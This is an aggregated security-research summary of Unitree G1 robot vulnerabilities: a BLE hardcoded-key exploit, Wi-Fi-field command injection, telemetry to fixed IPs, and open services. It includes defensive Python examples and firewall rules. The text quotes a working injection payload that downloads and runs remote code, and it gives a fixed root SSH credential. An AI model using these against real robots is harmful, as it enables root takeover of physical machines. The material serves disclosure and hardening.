Cybersecurity of the Unitree G1 — Detailed Findings

Sources: arXiv:2509.14096, arXiv:2509.14139, UniPwn (GitHub: Bin4ry/UniPwn), FreeBOT (theroboverse.com)
Fetched: 2026-02-13
Type: Security Research — Aggregated Findings


Locomotion Computer Hardware

  • Processor: Rockchip RK3588 (8-core ARM Cortex-A76/A55)
  • RAM: 8GB LPDDR4X
  • Storage: 32GB eMMC
  • Kernel: Linux 5.10.176-rt86+ (real-time patched)
  • Network: eth0 at 192.168.123.161/24, wlan0 at 192.168.8.193/24

Software Architecture

  • master_service orchestrator (9.2 MB binary) supervises 26 daemons
  • ai_sport — primary locomotion/balance policy (145% CPU, 135 MB RAM)
  • state_estimator — sensor fusion (~30% CPU)
  • motion_switcher — gait mode management
  • robot_state_service, dex3_service_l/r, webrtc_bridge, ros_bridge
  • Configuration files are encrypted in a custom FMX format: Blowfish in ECB mode combined with an LCG-derived keystream, under static keys (format only partially reverse-engineered). Because the keys are static and embedded in the firmware, the confidentiality of these files is only as good as the secrecy of the binary they ship in.
  • Unix socket: /unitree/var/run/master_service.sock

Known Vulnerabilities

UniPwn BLE Exploit (Bin4ry, Sep 2025)

  • Affects: G1, H1, R1, Go2, B2
  • Hardcoded AES key, identical across ALL affected Unitree robots (one fleet-wide key, extractable from any single unit)
  • Authentication: the BLE handshake accepts the string "unitree" encrypted under that known key, so anyone holding the key passes on every robot; there is no per-device secret and no nonce
  • SSID/password fields from the Wi-Fi provisioning command are interpolated into a shell command run via system() as root, so the fields are a command-injection path to a root shell
  • Wormable: infected robot can scan BLE and compromise other Unitree robots
  • GitHub: Bin4ry/UniPwn
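The handshake bullet above is the core of the weakness: a token that is a fixed function of a fixed fleet key is a password shared by every unit, not a challenge-response. The model below is an added illustration written for this page, not code from UniPwn or from Unitree's firmware. It uses HMAC-SHA256 as a stand-in for the AES operation the findings describe (so it runs on the Python standard library) and a placeholder key that is not the real one; the replay/transfer properties it demonstrates do not depend on which primitive is used.

```python
import hashlib
import hmac
import secrets

# Placeholder fleet key (NOT the real Unitree key). HMAC-SHA256 stands in for the
# AES operation reported in the findings so the example runs on stdlib only; the
# property shown (fixed key + fixed message = constant, replayable token) holds for
# either primitive.
FLEET_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
FIXED_MESSAGE = b"unitree"


def fleet_token(key: bytes = FLEET_KEY) -> bytes:
    """Legacy handshake token: a pure function of the shared key, so a constant."""
    return hmac.new(key, FIXED_MESSAGE, hashlib.sha256).digest()


class LegacyRobot:
    """Models the reported check: any client presenting fleet_token() is accepted."""

    def authenticate(self, token: bytes) -> bool:
        return hmac.compare_digest(token, fleet_token())


class ChallengeRobot:
    """Hardened alternative: a per-device key and a fresh nonce per attempt."""

    def __init__(self, device_key: bytes) -> None:
        self._key = device_key
        self._nonce = None

    def challenge(self) -> bytes:
        self._nonce = secrets.token_bytes(16)
        return self._nonce

    def authenticate(self, response: bytes) -> bool:
        if self._nonce is None:
            return False
        expected = hmac.new(self._key, self._nonce, hashlib.sha256).digest()
        self._nonce = None  # single use: a captured response is useless afterwards
        return hmac.compare_digest(response, expected)


def client_response(device_key: bytes, nonce: bytes) -> bytes:
    """What a legitimate client (the app) computes from its provisioned device key."""
    return hmac.new(device_key, nonce, hashlib.sha256).digest()


def run_scenarios() -> dict:
    """Attacker model: knows FLEET_KEY (read from any one robot) and can sniff BLE."""
    out = {}
    # 1. Legacy: knowing the fleet key is enough for every robot, no interaction needed.
    out["legacy_attacker_accepted"] = LegacyRobot().authenticate(fleet_token(FLEET_KEY))

    # 2. Challenge-response with a per-device key.
    device_key = secrets.token_bytes(32)
    robot = ChallengeRobot(device_key)
    nonce = robot.challenge()
    sniffed = client_response(device_key, nonce)
    out["challenge_honest_accepted"] = robot.authenticate(sniffed)

    # Replaying the sniffed response against a new session fails (new nonce).
    robot.challenge()
    out["challenge_replay_accepted"] = robot.authenticate(sniffed)

    # A key extracted from a different robot does not transfer to this one.
    other_robot = ChallengeRobot(secrets.token_bytes(32))
    out["challenge_foreign_key_accepted"] = other_robot.authenticate(
        client_response(device_key, other_robot.challenge())
    )
    return out


if __name__ == "__main__":
    for name, accepted in run_scenarios().items():
        print(f"{name}: {accepted}")
```

The nonce is what stops replay, but the per-device key is what actually closes the UniPwn class of bug: a challenge-response that still used one key on every unit would fall to anyone who had extracted that key from a single robot.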

FreeBOT Jailbreak (TheRoboVerse)

  • Command injection via the WiFi password field in the mobile app (same class of bug as the UniPwn SSID/password injection)
  • Payload: ;curl -L 4jb.me|sh;#  (the leading ';' ends the intended command, '|sh' runs whatever is downloaded, '#' comments out the rest of the line)
  • Works on firmware 1.3.0-1.6.0 (as reported)
  • SSH after jailbreak: root:theroboverse (a fixed, published credential; change it or disable password SSH login before the robot joins any shared network)
  • Reported as patched in firmware 1.1.8+ (October 2025). Caveat: that version number is lower than the affected range above, so the two figures as given are inconsistent; confirm the fixed version against the vendor's release notes rather than relying on either number.
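Both injection findings (the UniPwn SSID/password fields handed to system() and the FreeBOT payload in the password field) come down to the same pattern: an untrusted provisioning field is formatted into a shell string. The example below is added for this page and is not code from UniPwn, FreeBOT or the robot's firmware. The findings do not say which command the daemon actually runs, so `nmcli` is assumed purely to make the pattern concrete. It shows the vulnerable build beside the hardened argv build, and a small shell-parsing approximation that counts how many commands each string would launch.

```python
import shlex

# Payload quoted on this page for the FreeBOT jailbreak; reproduced as data only and
# never executed by this example.
FREEBOT_PAYLOAD = ";curl -L 4jb.me|sh;#"

# The findings do not say which command the robot's daemon runs; `nmcli` is assumed
# here purely to make the pattern concrete.
WIFI_TOOL = "nmcli"


def build_wifi_command_vulnerable(ssid: str, password: str) -> str:
    """The reported bug pattern: untrusted fields formatted into a single shell
    string that is then handed to system() as root. Returned here, not executed."""
    return f"{WIFI_TOOL} dev wifi connect {ssid} password {password}"


def validate_ssid(ssid: str) -> bool:
    """802.11 SSID: 1..32 bytes, no control characters."""
    raw = ssid.encode("utf-8")
    return 1 <= len(raw) <= 32 and not any(b < 0x20 or b == 0x7F for b in raw)


def validate_passphrase(password: str) -> bool:
    """WPA2-PSK passphrase: 8..63 printable ASCII. Note that ';', '|' and '#' are
    all legal here, so filtering them would reject real passwords; the fix is to
    keep the value out of a shell, not to sanitise it."""
    return 8 <= len(password) <= 63 and all(0x20 <= ord(c) <= 0x7E for c in password)


def build_wifi_argv_hardened(ssid: str, password: str) -> list:
    """Hardened form: validate, then pass each field as its own argv element for
    execve()/subprocess.run(argv) so no shell ever parses the password."""
    if not validate_ssid(ssid):
        raise ValueError("invalid SSID")
    if not validate_passphrase(password):
        raise ValueError("invalid passphrase")
    return [WIFI_TOOL, "dev", "wifi", "connect", ssid, "password", password]


def hardened_accepts(ssid: str, password: str) -> bool:
    try:
        build_wifi_argv_hardened(ssid, password)
        return True
    except ValueError:
        return False


def build_wifi_command_quoted(ssid: str, password: str) -> str:
    """Second-best form when a shell string is unavoidable: quote each field."""
    build_wifi_argv_hardened(ssid, password)  # same validation as the argv form
    return f"{WIFI_TOOL} dev wifi connect {shlex.quote(ssid)} password {shlex.quote(password)}"


def shell_command_count(cmd: str) -> int:
    """Approximate how many simple commands a POSIX shell would run for `cmd`:
    counts non-empty segments split on unquoted ';', '|', '&' or newline, honours
    single and double quotes, and stops at a '#' that starts a word. Backslash
    escapes are ignored, which is enough for the strings compared here."""
    count = 0
    in_single = in_double = False
    seg_nonblank = False
    at_word_start = True
    for c in cmd:
        if in_single:
            if c == "'":
                in_single = False
            continue
        if in_double:
            if c == '"':
                in_double = False
            continue
        if c == "'":
            in_single, seg_nonblank, at_word_start = True, True, False
        elif c == '"':
            in_double, seg_nonblank, at_word_start = True, True, False
        elif c in ";|&\n":
            if seg_nonblank:
                count += 1
            seg_nonblank, at_word_start = False, True
        elif c == "#" and at_word_start:
            break
        elif c.isspace():
            at_word_start = True
        else:
            seg_nonblank, at_word_start = True, False
    if seg_nonblank:
        count += 1
    return count


if __name__ == "__main__":
    vuln = build_wifi_command_vulnerable("HomeWiFi", FREEBOT_PAYLOAD)
    print(vuln, "->", shell_command_count(vuln), "commands")
    quoted = build_wifi_command_quoted("HomeWiFi", FREEBOT_PAYLOAD)
    print(quoted, "->", shell_command_count(quoted), "command")
    print(build_wifi_argv_hardened("HomeWiFi", FREEBOT_PAYLOAD))
```

The point worth noticing is that the FreeBOT payload passes the passphrase validator: it is a perfectly legal 20-character WPA2 passphrase. Only the shell turns it into three commands (the connect command, `curl`, and `sh`), which is why the argv form, not a character blocklist, is the fix.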

Known CVEs on RK3588

  • CVE-2023-52660, CVE-2025-38081, CVE-2024-57256

Telemetry (Data Exfiltration)

  • Robot phones home roughly every 5 minutes via MQTT (port 17883)
  • Data sent: audio, video, LiDAR, GPS, robot state
  • Destination IPs: 43.175.228.18, 43.175.229.18, 8.222.78.102
  • Mitigation: drop outbound traffic from the robot to these IPs and to port 17883 at the network firewall, or put the robot on a segment with no internet route. The IP list is a point-in-time observation (fetched 2026-02-13), so the isolated segment is the durable option; an IP/port blocklist should be paired with monitoring for new outbound destinations.
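The cadence and fixed destinations above make the telemetry easy to detect from flow logs at the gateway, and the blocklist form of the mitigation is two firewall rules. The script below is an added example written for this page, not tooling from any of the cited sources. The flow records are constructed for the example (not a real capture) and use the "epoch src dst dport proto bytes" layout assumed here; the nftables rules assume a forward chain on a gateway between the robot's 192.168.123.0/24 segment and the internet.

```python
from collections import defaultdict
from statistics import median

# Values taken from the findings on this page.
TELEMETRY_IPS = {"43.175.228.18", "43.175.229.18", "8.222.78.102"}
TELEMETRY_PORT = 17883
EXPECTED_INTERVAL_S = 300  # "every ~5 minutes"

# Constructed flow records for the example, not a real capture.
# Format assumed here: "<epoch> <src> <dst> <dport> <proto> <bytes>"
SAMPLE_FLOWS = """\
1700000000 192.168.123.161 43.175.228.18 17883 tcp 18234
1700000002 192.168.123.161 192.168.123.222 7400 udp 612
1700000150 192.168.123.50 142.250.72.14 443 tcp 4200
1700000300 192.168.123.161 43.175.228.18 17883 tcp 17902
1700000601 192.168.123.161 43.175.228.18 17883 tcp 18811
1700000900 192.168.123.161 43.175.229.18 17883 tcp 18155
1700001199 192.168.123.161 43.175.229.18 17883 tcp 17740
"""


def parse_flows(text: str) -> list:
    """Parse the constructed flow format into (ts, src, dst, dport, proto, bytes)."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto, nbytes = line.split()
        flows.append((int(ts), src, dst, int(dport), proto, int(nbytes)))
    return flows


def find_telemetry_beacons(flows, min_events: int = 3, tolerance: float = 0.1) -> dict:
    """Group flows to the telemetry IPs or port by source host and test the
    inter-flow gaps against the ~5 minute cadence. Returns {src: summary}."""
    per_src = defaultdict(list)
    for ts, src, dst, dport, _proto, nbytes in flows:
        if dst in TELEMETRY_IPS or dport == TELEMETRY_PORT:
            per_src[src].append((ts, nbytes))
    report = {}
    for src, events in per_src.items():
        events.sort()
        if len(events) < min_events:
            continue
        stamps = [ts for ts, _ in events]
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        med = median(gaps)
        report[src] = {
            "events": len(events),
            "median_interval_s": med,
            "periodic": abs(med - EXPECTED_INTERVAL_S) <= tolerance * EXPECTED_INTERVAL_S,
            "bytes_out": sum(n for _, n in events),
        }
    return report


def nft_egress_rules(robot_ip: str) -> list:
    """Rules for an nftables forward chain on the gateway implementing the
    blocklist form of the mitigation (the isolated-segment form needs none)."""
    ipset = ", ".join(sorted(TELEMETRY_IPS))
    return [
        f"ip saddr {robot_ip} ip daddr {{ {ipset} }} counter drop",
        f"ip saddr {robot_ip} tcp dport {TELEMETRY_PORT} counter drop",
    ]


if __name__ == "__main__":
    for src, summary in find_telemetry_beacons(parse_flows(SAMPLE_FLOWS)).items():
        print(src, summary)
    for rule in nft_egress_rules("192.168.123.161"):
        print(rule)
```

Matching on either the destination set or the port keeps the detector useful if the server IPs move; the DDS traffic to another host on the robot segment and the unrelated HTTPS flow are correctly left out of the report.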

Open Services on 192.168.123.161

  • DDS/Iceoryx: UDP 7400 (reachable from the 192.168.123.0/24 segment; this is the path external computers use to publish commands and custom policies)
  • WebRTC signal server: port 8081
  • MQTT: port 17883 (an outbound client connection to the telemetry servers listed above, not a listening service)

Key Conclusion

Root access on the RK3588 is achievable via the BLE exploits above. However, nobody has publicly documented replacing ai_sport (the stock locomotion policy) with a custom binary, or extracting the RL policy weights from it. The FMX-encrypted configuration files and the master_service orchestrator remain the barriers. Every research group covered by these sources instead deploys custom policies from an external computer over DDS.